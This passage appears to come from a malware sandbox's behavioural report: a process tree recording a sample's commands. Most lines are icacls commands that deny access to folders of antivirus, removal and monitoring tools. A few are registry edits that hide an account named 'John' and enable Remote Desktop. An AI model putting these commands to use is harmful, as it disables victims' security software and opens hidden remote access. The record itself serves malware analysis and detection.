4⤵
PID:6244

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6252

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5696

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1072

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
5⤵
PID:6140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6720

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
5⤵
PID:1512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6684

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6716

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
5⤵
PID:6808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6840

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3656

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5144

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5916

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
4⤵
PID:5884

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
5⤵
PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1332

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
PID:3276

C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
5⤵
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1804

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
4⤵
PID:2876

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
5⤵
PID:1096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5292

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2760

C:\Windows\system32\icacls.exe
icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4412

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4536

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6092

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6096

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
4⤵
PID:3224

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
5⤵
PID:2856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
4⤵
PID:6320

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
5⤵
PID:5584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
4⤵
PID:2288

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
5⤵
PID:4676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5072

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
PID:6152

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
5⤵
PID:6324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3684

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
4⤵
PID:6372

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6416

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
4⤵
PID:1408

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
5⤵
PID:6380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6616

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
4⤵
PID:3260

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
5⤵
PID:3596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6580

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
5⤵
PID:5972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
4⤵
PID:2644

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6340

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
4⤵
PID:6220

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
5⤵
PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1216

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6284

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
5⤵
PID:6124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2444

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
4⤵
PID:448

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
5⤵
PID:5716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2832

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4476

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1928

C:\Windows\system32\icacls.exe
icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
5⤵
PID:672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1788

C:\Windows\system32\icacls.exe
icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1648

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
5⤵
PID:6756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6864

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2188

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
4⤵
PID:2336

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6896

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
5⤵
PID:7044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
4⤵
PID:5460

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6444

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
4⤵
PID:7160

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
5⤵
PID:7072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5780

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
5⤵
PID:6252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
4⤵
PID:7052

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
5⤵
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5804

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
4⤵
PID:5644

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
5⤵
PID:7136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5704

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
4⤵
PID:5636

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2592

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3656

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
4⤵
PID:6188

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3048

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
4⤵
PID:2604

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2688

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:456

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
5⤵
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
4⤵
PID:4632

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3276

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
5⤵
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4072

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
4⤵
PID:1704

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
5⤵
PID:1100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2628

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6088

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5788

C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2132

C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4052

C:\Windows\system32\icacls.exe
icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
5⤵
PID:3224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5864

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
4⤵
PID:1212

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
5⤵
PID:6500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6072

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6232

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
5⤵
PID:2932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6396

C:\Windows\system32\icacls.exe
icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
5⤵
PID:4320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5028

C:\Windows\system32\icacls.exe
icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2452

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
5⤵
PID:6820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6468

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6572

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
5⤵
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5580

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6544

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6024

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5752

C:\Windows\system32\icacls.exe
icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6524

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5492

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
4⤵
PID:6048

C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
5⤵
- Modifies file permissions
PID:5188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
4⤵
PID:3588

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5716

C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
5⤵
- Modifies file permissions
PID:6020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
4⤵
PID:3884

C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
5⤵
- Modifies file permissions
PID:6044

C:\Windows\system32\cmd.exe
